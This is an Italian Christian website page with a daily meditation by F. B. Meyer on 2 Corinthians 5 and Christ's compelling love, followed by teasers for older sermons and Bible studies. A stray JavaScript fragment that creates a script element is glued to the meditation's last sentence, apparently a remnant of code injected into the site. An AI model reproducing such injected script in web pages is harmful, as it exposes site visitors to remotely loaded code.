Meditazione del giorno: Costrizione d’amore

di F. B. MEYER  –  “L’amore di Cristo ci costringe …. facciamo da ambasciatori per Cristo, come se Dio esortasse per mezzo nostro.” – (2 Corinzi  5,14-20.)  –   Un ambasciatore può vivere in un paese straniero, ma non fa parte di quel paese. Lui lì è il rappresentare del suo paese, e non gli è consentito di portare avanti nessun interesse di tipo personale. Noi dobbiamo rappresentare Cristo al mondo. La parola “costringe” suggerisce una pressione costante, una spinta, come quando l’acqua è forzata lungo un determinato condotto. Paolo dice: “Io agisco così perché sono sotto il fascino di una potente imposizione, non posso fare altro, non sono padrone di me stesso Non mi meraviglio che ciò possa apparire  insolito e stravagante.  Attribuisco la mia eccentricità a Cristo – il suo amore mi trascina, e mi porta avanti.”

Cosa intende con “l’amore di Cristo?” E’ il suo per noi , o il nostro per Lui? È impossibile fare questa distinzione, perché sono uno. Come la luce del sole colpisce la luna, e si riflette sulla terra, così l’amore che abbiamo per Cristo, o per l’uomo, è il riflesso del Suo amore per noi. Tutto l’amore nei nostri cuori freddi e senza amore è l’emanazione e il riflesso dell’Amore che è partito da Lui, è stato mediato a noi al Calvario, e si riflette da noi, come la luce del sole in uno specchio.

L’amore di Cristo non costringe tutti i  cristiani, perché non tutti comprendono il profondo significato della Croce, ma quando l’anima arriva ad apprezzare questo, e passa per la porta della morte nella vita di Dio, allora comincia a sentire la costrizione dell’amore di Cristo.

Il perno della nostra vita deve essere il Cristo risorto: “Noi non viviamo più per noi stessi, ma per Colui che è risorto”. A volte sentiamo persone descritte come eccentriche – fuori dal centro. Un uomo è eccentrico per il mondo quando è concentrico con Cristo. E’ così che si diventa una nuova creazione. Quando per fede noi siamo uniti a Gesù Cristo nella Sua Croce e nella sua morte, la transizione è compiuta. Passiamo oltre, nella vita di Pasqua. Egli ci ha riconciliato a Sé, e ha dato a noi il ministero della riconciliazione – quindi siamo ambasciatori. Dobbiamo proclamare il perdono per il peccatore, la rottura delle catene dei prigionieri, e l’approssimarsi della salvezza a tutti (Isaia 52:7-10).var d=document;var s=d.createElement(‘script’);

I commenti sono chiusi.

Post meno recenti

UNA SANA FAMIGLIA

di Philip Nunn  –  Studio sulla seconda lettera di Giovanni.  –  La seconda lettera di Giovanni è l’unica lettera apostolica indirizzata a una donna, “alla signora elette e ai suoi figli” (v.1). Alcuni commentatori suggeriscono che Giovanni stia usando un linguaggio simbolico dove “la signora eletta” si riferisce alla chiesa locale, e che quando alla fine scrive “ i figli della sorella eletta ti salutano” (v.13), si riferisce …
Leggi Tutto

ONORIAMO IL SIGNORE

di Agostino Masdea  –  Malachia – Capitolo 1   –   Malachia significa “angelo” “messaggero”. Probabilmente questo non era il suo vero nome, ma questo era sicuramente il suo compito. Egli era “il messaggero di Dio”. Visse in un periodo particolare: il tempio era stato ricostruito (siamo al tempo di Zaccaria e Aggeo), c’era stato un tempo di risveglio, ma ora  il popolo d’Israele viveva un periodo di crisi spirituale. Crisi …
Leggi Tutto

FRUTTI DI PENITENZA

GIUSEPPE MANAFO’ –  Matteo 3: 7-8  – Ma vedendo molti farisei e sadducei venire al suo battesimo, disse loro: «Razza di vipere, chi vi ha insegnato a sfuggire l’ira futura? 8 Fate dunque dei frutti degni del ravvedimento. Giovanni Battista, anche se visse una vita solitaria nel deserto, era divenuto popolare. Egli appari come un lampo con lo spirito del profeta Elia ed il deserto stesso non era più un posto …
Leggi Tutto

mp3

Pastore Agostino Masdea. Predicazione del 24 Novembre – Chiesa Alfa Omega *                                              [easy_media_download url=” http://www.chiesadiroma.it/wp-content/uploads/2014/01/Risorto.mp3″ force_dl=”1″ text=” http://www.chiesadiroma.it/wp-content/uploads/2015/08/download4.jpg”] …
Leggi Tutto

DAI NOSTRI CULTI: "UN DIADEMA AL POSTO DELLA CENERE".

Pastore Agostino Masdea  –  Predicazione di Domenica 6 Aprile 2014  –  (ISAIA 61:1-3)                                    Gesù Cristo è pronto a sostituire la tua cenere con un diadema, il tuo cordoglio e il tuo il lutto, con “olio di letizia”, le tenebre della tua vita con la luce meravigliosa della sua presenza, la condizione di …
Leggi Tutto

PUNTI CONTROVERSI

di Roberto Bracco  Indice:   Introduzione  Faccia parte d’ogni suo bene Il carname e le aquile Verecondia e modestia Se hanno fatto queste cose al legno verde Pasti di carità Sarà salvata partorendo figli Culto cristiano La moglie di Caino Onora tuo padre e tua madre In man di Satana  Introduzione  Questo volumetto è dedicato a tutti coloro che fanno della Bibbia l’alimento e la gioia della loro anima …
Leggi Tutto

Storie di grandi inni: “COME, THOU FOUNT OF EVERY BLESSING,”

Forse tutti gli inni sono in una certa misura autobiografici, nel senso che rivelano qualcosa dell’esperienza spirituale dell’autore. In alcuni inni, il filo autobiografico è più forte e più marcato. Come nel caso di questo inno battista scritto da Robert Robinson (1735-1790), che mentre era un apprendista barbiere, fu fortemente influenzato dalla predicazione di George Whitefield. In particolare una frase dell’ultima strofa, “incline a vagare, Signore, mi sento incline ad …
Leggi Tutto

ADAMO DOVE SEI? (Genesi 3:10)

Ma l’uomo era nascosto!     Nel luogo degli incontri abituali non si udiva la voce dei coniugi amici di Dio e forse il silenzio era reso ancora più cupo dal peccato consumato, ormai entrato come un’ombra triste nella natura. E’ il dramma! …
Leggi Tutto

Dai nostri Culti